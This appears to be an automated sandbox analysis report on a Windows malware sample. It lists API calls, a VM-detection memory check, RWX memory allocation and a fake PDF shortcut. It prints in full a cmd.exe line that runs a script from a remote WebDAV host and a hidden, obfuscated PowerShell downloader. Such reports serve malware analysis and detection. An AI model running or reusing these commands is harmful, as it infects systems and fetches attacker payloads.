CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d9fc8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d99c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003d99c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da7c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da7c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da7c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da7c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da7c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 28, 2025, 9:35 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003da7c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 28, 2025, 9:35 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 194 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 28, 2025, 9:33 a.m.	process_identifier: 3020 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e92000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 28, 2025, 9:33 a.m.	process_identifier: 3020 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72f13000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 2448 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e92000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02611000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02612000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02703000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02704000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02737000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02735000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02705000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02706000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02723000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02726000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02728000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02729000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2025, 9:35 a.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\Verkoopcontract Data Markus.pdf.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c\\196.251.90.185@36123\Doku\Glaserende.cmd
cmdline	powershell.exe -windowstyle hidden "Get-Service;$Bloddonationntolerancerne='func';Get-History;$Bloddonationntolerancerne+='t';Get-History;$Bloddonationntolerancerne+='i';$Overscepticalness=Get-History;$Bloddonationntolerancerne+='on:';(ni -p $Bloddonationntolerancerne -n Valence -value { param($Analysable);$Bloddonation=2;do {$Advarselsmeddelelsen+=$Analysable[$Bloddonation];$Bloddonation+=3} until(!$Analysable[$Bloddonation])$Advarselsmeddelelsen});ConvertTo-Html;(ni -p $Bloddonationntolerancerne -n Rosmus103 -value {param($Ditikerne);.($Reffed21) ($Ditikerne)});ConvertTo-Html;$Programadministrationen=Valence 'Fon TEWet r.P.W';$Programadministrationen+=Valence 'kreA BHac ol oI tEW.N at';$lamplighter=Valence 'CoM po ez oiV lTrlA aDa/';$Unpompously=Valence 'amTDal s j1 a2';$Ggen='Kl[FaNAfeViTSp.,asamEByRBrvSviBec e Wp OGlISknAlTUnMMoa MNEpaToG E BRF,]Ca:S :Ins ,ePrCL UFir I KtReY hp rP.oPrT FOTeC Fo iLAu=Se$ReU Ln.lp RO.eMRhpO OS.U Ks .l nY';$lamplighter+=Valence 'An5 m.Ap0Go l(UlW Ei.kn dSoo RwTis P NA,Tf My1 r0Pr. x0Co;a PrW SiGanS 6El4Pu; j R x 6 l4 M;Di f,r ovS :K 1,n3 4Ri.Ch0Sk) S JuG GeFycSkkHoo r/ 2,l0Kr1Ph0 .0Sa1 a0Ov1P EtF .iTrrSee .fInoGexTi/Jo1 3,o4kr.Hi0';$Sorels=Valence 'FeU .StiES.RH -daaFeGTrEDeNUnT';$alters=Valence ' KhTetTet ppHysPi:ab/ a/ PwBrwUdwJ,.Rea .eb n BnOvaHua MrUntBe.A.d Se B/C w pUn- .iSkn cSalBouBadBaeJesMa/QuiSkm Fa AgR e Us /HjcPrr yMesPot ,aB l N/UdHsya egMug Va i H.tidRus rp';$Synthesizations=Valence 'fo>';$Reffed21=Valence 'Ali,peStX';$Speal='unincarnate';$Unvariation='\Serbiskes.Ali';Rosmus103 (Valence 'Bl$R.G .LEko LbE.aPrl A:.aAC funDtjAD NRisFen iI.uN.nG DSPr=Te$DyE an bV ,:OuAB PDepurdGeAA.t NASa+Sl$Pau onA v.nASmR IS ASyTU I,ooRen');Rosmus103 (Valence 'Ks$ igM lLnOFlBUnaSvLFi:FrGKoAPaSUntA rPso ppF,L ,aHysBetReySe=H $ViaSalXiTAaeUnrEnsSi.FeSElp olM IPrtB ( F$ RsAdYF,NSmT DH He MSPoiWiZUbATutS,I AoFoND SHa)');Rosmus103 (Valence $Ggen);$alters=$Gastroplasty[0];$Ascomycetal=(Valence 'Ca$K gCaLvrOMobudaBeL S:Frf iOUnrB.A Fn LSHuTC,A,el,pt.peTe=CaN ,ePuW.e-P oG.b RJRheSmcToT T Sks YU S.at fe umFo.De$ViPNoR GOAsGS RGua lm.hASkd rm aiC.n iAfS aTR r .a.rtBaI,ooT Nb,ePiN');Rosmus103 ($Ascomycetal);Rosmus103 (Valence ' B$AfFAdosorReaA.n jsA t oaD lMitbie S. KHs.eMaa.idste rP sIn[br$VeSSaoMerReeA l ,s,u]M =Yn$oplDaaBrm.op,elFaiNogMahT,tRee r');$Espressoers=Valence 'Af$ IF .oQur Sa nUnsBetF,aP,lB tN,e a.ChDM o KwSrnB l ao aChdTeF OiTml teP (In$HmaNelAntUneTir.isBo,.o$ sTrohE rduuGrsRot ,f uSpl en TeUnsUnsRu)';$Thrustfulness=$Afdansnings;Rosmus103 (Valence 'S.$RegL.lBrO,oB HAv LUd: Fa .m PA pTKrrKoe RS n.eEP =B (Alt.reNis Kto -GaP ,a.hT H . In$ ,T.ehStRs,UFosS t ufBeUFolsiN.lE ,s sko)');while (!$Amatrerne) {Rosmus103 (Valence 'Bi$ ,gMol yoSkb.ea nlFo:AnAMibTroJerJutE hProR,l,rd anVeiStnRigJe=Ky$N AAkn.ntAriRepSkrH i Se Os,at') ;Rosmus103 $Espressoers;Rosmus103 (Valence ' M[ oT UH aR e FA eDMeiThN Rg r. TNeh Gr.re JADiD p] r: ,: ks.alReEIneP,pA ( ,4P.0Ud0Kl0Ov)');Rosmus103 (Valence 'C $ ,GC l Ho ObT AS,lWo:FrAVomSeapot oRBiE eR nT e o= a( DT eIdS UtK - .PNoAraT Hko P$ HtBrH mrFoU GS .T BfRaU kLS NC ECasT se )') ;Rosmus103 (Valence ' o$ NGDeLM oA,BShAonL : oRP ASmnS dJeMFlO rAcn ReUnrI,NTee U= M$ SGQulRao ,B aShL e:C,NBuOOrNSadFlE N uA m .EAaRA,a abTil,aE c+Bo+F %Gl$ gTeA.asMaTH.RTrOLapTtlKoa ls tI YFr. tc eoS U OnFrt') ;$alters=$Gastroplasty[$randmornerne]}$Operationsbeskrivelsers=441444;$Bjergomraader=29090;Rosmus103 (Valence 'Wh$tiGVal eoUfb rASpLFo:.oCDiaP RTrG .aPl Ok= G PGImEfotUn- CMeomiNWaT SeGaNA T B D $ eT ,HA r kU nsRhtp.F Iu OLB ND.EDiSOvs');Rosmus103 (Valence 'Fi$GugNol noChbM,a TlSm: PCG oHontotSyu imF.a xIm2,v3B 3 o Fa= P m[BiS oySus Bt ee.amBu. SCFeoFun evUne srF.tCl]Hj: t:HeF WrKroSnmF B aa osBre 6Ph4SuSNat,pr i nSugSa( D$TaCL aTirTigstaFi)');Rosmus103 (Valence 'K.$H,GHalM.o TbDraHel V: BoAfr ne . =Br Ma[ArsFeYBuSC tFieBrM,r.TrT oEB x VT ,.T,E Sn ,cS,o tD ,i NFrgF,]Em: :Ska,nSDiCB.iSeIAn.NeG.re FT aSnaTG RUni YN SgCo(P,$EfcSooS.NPyTGeUSrMCaAClXfa2 3Bi3So)');Rosmus103 (Valence 'Un$ NGU.LKeoSnBChAUnlFl: eL oInVOrlUnyCydA I SGAuTBy=,e$L oKaRFoER.. Ss NUU b nS Pt Gr I rnTaGKi( B$ oo pGuespRIraChTCoi OCoN PSbeB,ee US MKKiR,si rV NeStLSus.lEKoRDes H,Wa$AnB RJCreTaR .G UO RM.nrSta ,a.ed AeUnRPe)');Rosmus103 $Lovlydigt;"
cmdline	cmd.exe /c\\196.251.90.185@36123\Doku\Glaserende.cmd

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW March 28, 2025, 9:35 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c\\196.251.90.185@36123\Doku\Glaserende.cmd filepath: cmd.exe	1	1	0
CreateProcessInternalW March 28, 2025, 9:35 a.m.	thread_identifier: 1392 thread_handle: 0x00000088 process_identifier: 1680 current_directory: filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell.exe -windowstyle hidden "Get-Service;$Bloddonationntolerancerne='func';Get-History;$Bloddonationntolerancerne+='t';Get-History;$Bloddonationntolerancerne+='i';$Overscepticalness=Get-History;$Bloddonationntolerancerne+='on:';(ni -p $Bloddonationntolerancerne -n Valence -value { param($Analysable);$Bloddonation=2;do {$Advarselsmeddelelsen+=$Analysable[$Bloddonation];$Bloddonation+=3} until(!$Analysable[$Bloddonation])$Advarselsmeddelelsen});ConvertTo-Html;(ni -p $Bloddonationntolerancerne -n Rosmus103 -value {param($Ditikerne);.($Reffed21) ($Ditikerne)});ConvertTo-Html;$Programadministrationen=Valence 'Fon TEWet r.P.W';$Programadministrationen+=Valence 'kreA BHac ol oI tEW.N at';$lamplighter=Valence 'CoM po ez oiV lTrlA aDa/';$Unpompously=Valence 'amTDal s j1 a2';$Ggen='Kl[FaNAfeViTSp.,asamEByRBrvSviBec e Wp OGlISknAlTUnMMoa MNEpaToG E BRF,]Ca:S :Ins ,ePrCL UFir I KtReY hp rP.oPrT FOTeC Fo iLAu=Se$ReU Ln.lp RO.eMRhpO OS.U Ks .l nY';$lamplighter+=Valence 'An5 m.Ap0Go l(UlW Ei.kn dSoo RwTis P NA,Tf My1 r0Pr. x0Co;a PrW SiGanS 